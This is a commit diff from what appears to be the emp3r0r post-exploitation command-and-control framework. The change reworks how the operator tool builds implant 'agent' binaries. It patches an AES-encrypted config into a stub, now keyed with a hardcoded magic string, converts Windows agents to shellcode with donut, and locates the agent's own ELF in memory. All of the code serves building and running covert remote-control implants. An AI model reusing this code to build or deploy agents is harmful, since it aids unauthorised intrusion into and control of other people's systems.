fix: simplify agent binary patching

ditched the one-time magic string

Author: jm33-m0

core/cmd/cc/main.go

@@ -58,9 +58,6 @@ func init() {
 	if err != nil {
 		log.Fatalf("C2 file paths setup: %v", err)
 	}
-
-	// set up magic string
-	live.InitMagicAgentOneTimeBytes()
 }
 
 func main() {

core/internal/cc/operator/generate.go

@@ -91,23 +91,20 @@ func CmdGenerateAgent(cmd *cobra.Command, args []string) {
 	}
 
 	// read and encrypt config file
-	encryptedJSONBytes, err := readAndEncryptConfig()
+	config_payload, err := readAndEncryptConfig()
 	if err != nil {
 		logging.Errorf("Failed to encrypt %s: %v", live.EmpConfigFile, err)
 		return
 	}
+	logging.Debugf("Config payload: %d bytes", len(config_payload))
 
 	// read stub file
 	toWrite, err := os.ReadFile(stubFile)
 	if err != nil {
 		logging.Errorf("Read stub: %v", err)
 		return
 	}
-	sep := bytes.Repeat(def.OneTimeMagicBytes, 2)
-
 	// payload
-	config_payload := append(sep, encryptedJSONBytes...)
-	config_payload = append(config_payload, sep...)
 	// binary patching, we need to patch the stub file at emp3r0r_def.AgentConfig, which is 4096 bytes long
 	if len(config_payload) < len(def.AgentConfig) {
 		// pad with 0x00
@@ -122,16 +119,6 @@ func CmdGenerateAgent(cmd *cobra.Command, args []string) {
 		bytes.Repeat([]byte{0xff}, len(config_payload)),
 		config_payload,
 		1)
-	// verify
-	if !bytes.Contains(toWrite, config_payload) {
-		logging.Warningf("Failed to patch %s with config payload, config data not found, append it to the file instead", stubFile)
-		// append config to the end of the file
-		err = appendConfigToPayload(stubFile, sep, encryptedJSONBytes)
-		if err != nil {
-			logging.Errorf("Failed to append config to payload: %v", err)
-			return
-		}
-	}
 	// write
 	if err = os.WriteFile(outfile, toWrite, 0o755); err != nil {
 		logging.Errorf("Save agent binary %s: %v", outfile, err)
@@ -141,8 +128,6 @@ func CmdGenerateAgent(cmd *cobra.Command, args []string) {
 	// done
 	logging.Successf("Generated %s from %s and %s",
 		outfile, stubFile, live.EmpConfigFile)
-	logging.Debugf("OneTimeMagicBytes is %x", def.OneTimeMagicBytes)
-
 	if payload_type == PayloadTypeWindowsExecutable {
 		// generate shellcode for the agent binary
 		donut.DonoutPE2Shellcode(outfile, arch_choice)
@@ -212,7 +197,7 @@ func readAndEncryptConfig() ([]byte, error) {
 	}
 
 	// encrypt
-	encryptedJSONBytes, err := crypto.AES_GCM_Encrypt(def.OneTimeMagicBytes, jsonBytes)
+	encryptedJSONBytes, err := crypto.AES_GCM_Encrypt([]byte(def.MagicString), jsonBytes)
 	if err != nil {
 		return nil, fmt.Errorf("failed to encrypt %s: %v", live.EmpConfigFile, err)
 	}

core/internal/def/def.go

@@ -14,9 +14,6 @@ var (
 	// use: C2 message construction and encryption
 	MagicString = "64781530-1475-4cf8-950c-dcdf4c619dbc"
 
-	// OneTimeMagicBytes as separator/password, generated at runtime, only used by agent program
-	OneTimeMagicBytes = []byte("6byKQ3Hcidum0NCdvJGK0w==")
-
 	// Transport what transport is this agent using? (HTTP2 / CDN / TOR)
 	Transport = "HTTP2"
 

core/internal/live/config.go

@@ -62,6 +62,24 @@ const (
 	UtilsArchive = WWWRoot + "utils.tar.xz"
 )
 
+func cleanupConfig() (err error) {
+	dents, err := os.ReadDir(EmpWorkSpace)
+	if err != nil {
+		return
+	}
+	for _, d := range dents {
+		if strings.HasSuffix(d.Name(), ".json") ||
+			strings.HasSuffix(d.Name(), ".pem") ||
+			strings.HasSuffix(d.Name(), ".history") {
+			err = os.Remove(EmpWorkSpace + "/" + d.Name())
+			if err != nil {
+				return
+			}
+		}
+	}
+	return
+}
+
 func DownloadExtractConfig(url string, downloader func(string, string) error) (err error) {
 	logging.Infof("Downloading and extracting config from %s to %s", url, EmpConfigTar)
 	// download config tarball from server
@@ -70,7 +88,7 @@ func DownloadExtractConfig(url string, downloader func(string, string) error) (e
 		return
 	}
 	// remove existing config files for a clean start
-	err = os.RemoveAll(EmpWorkSpace)
+	err = cleanupConfig()
 	if err != nil {
 		return
 	}
@@ -160,30 +178,6 @@ func ReadJSONConfig() (err error) {
 	return def.ReadJSONConfig(jsonData, RuntimeConfig)
 }
 
-// re-generate a random magic string for this CC session
-func InitMagicAgentOneTimeBytes() {
-	default_magic_str := def.OneTimeMagicBytes
-	def.OneTimeMagicBytes = util.RandBytes(len(default_magic_str))
-
-	// update binaries
-	files, err := os.ReadDir(EmpWorkSpace)
-	if err != nil {
-		logging.Fatalf("init_magic_str: %v", err)
-	}
-	for _, f := range files {
-		if f.IsDir() {
-			continue
-		}
-		if strings.HasPrefix(f.Name(), "stub-") {
-			err = util.ReplaceBytesInFile(fmt.Sprintf("%s/%s", EmpWorkSpace, f.Name()),
-				default_magic_str, def.OneTimeMagicBytes)
-			if err != nil {
-				logging.Fatalf("init_magic_str: %v", err)
-			}
-		}
-	}
-}
-
 // InitCertsAndConfig generate certs if not found, then generate config file
 func InitCertsAndConfig() error {
 	// if we are not running as server, return, the certs are already generated

core/lib/util/extract_elf.go

@@ -34,8 +34,9 @@ func FindEmp3r0rELFInMem() (elf_bytes []byte, err error) {
 		return
 	}
 
+	// FIXME: it used to be def.OneTimeMagicBytes, but it's not used anymore
 	for base, mem_region := range mem_regions {
-		if bytes.Contains(mem_region, exeutil.ELFMAGIC) && bytes.Contains(mem_region, def.OneTimeMagicBytes) {
+		if bytes.Contains(mem_region, exeutil.ELFMAGIC) && bytes.Contains(mem_region, []byte(def.MagicString)) {
 			if base != 0x400000 {
 				logging.Debugf("Found magic string in memory region 0x%x, but unlikely to contain our ELF", base)
 				continue

core/lib/util/mem.go

@@ -43,16 +43,16 @@ func extractFromMemory() ([]byte, error) {
 }
 
 func extractFromAgentConfig() ([]byte, error) {
-	data, err := DigEmbeddedData(def.AgentConfig[:], 0)
-	if err != nil {
-		return nil, err
-	}
-	return data, nil
+	// Get raw config bytes and strip trailing null bytes
+	enc_config := bytes.Trim(def.AgentConfig[:], "\x00")
+
+	// decrypt and verify
+	return VerifyConfigData(enc_config)
 }
 
 func VerifyConfigData(data []byte) (jsonData []byte, err error) {
 	// decrypt attached JSON file
-	jsonData, err = crypto.AES_GCM_Decrypt(def.OneTimeMagicBytes, data)
+	jsonData, err = crypto.AES_GCM_Decrypt([]byte(def.MagicString), data)
 	if err != nil {
 		err = fmt.Errorf("decrypt config JSON failed (%v), invalid config data?", err)
 		return
@@ -90,7 +90,7 @@ func DigEmbeddedData(data []byte, base int64) (embedded_data []byte, err error)
 	// OneTimeMagicBytes is 16 bytes long random data,
 	// generated by CC per session (delete ~/.emp3r0r to reset)
 	// we use it to locate the embedded data
-	magic_str := def.OneTimeMagicBytes
+	magic_str := []byte(def.MagicString) // used to be def.OneTimeMagicBytes
 	logging.Debugf("Digging with magic string '%x' (%d bytes)", magic_str, len(magic_str))
 	sep := bytes.Repeat(magic_str, 2)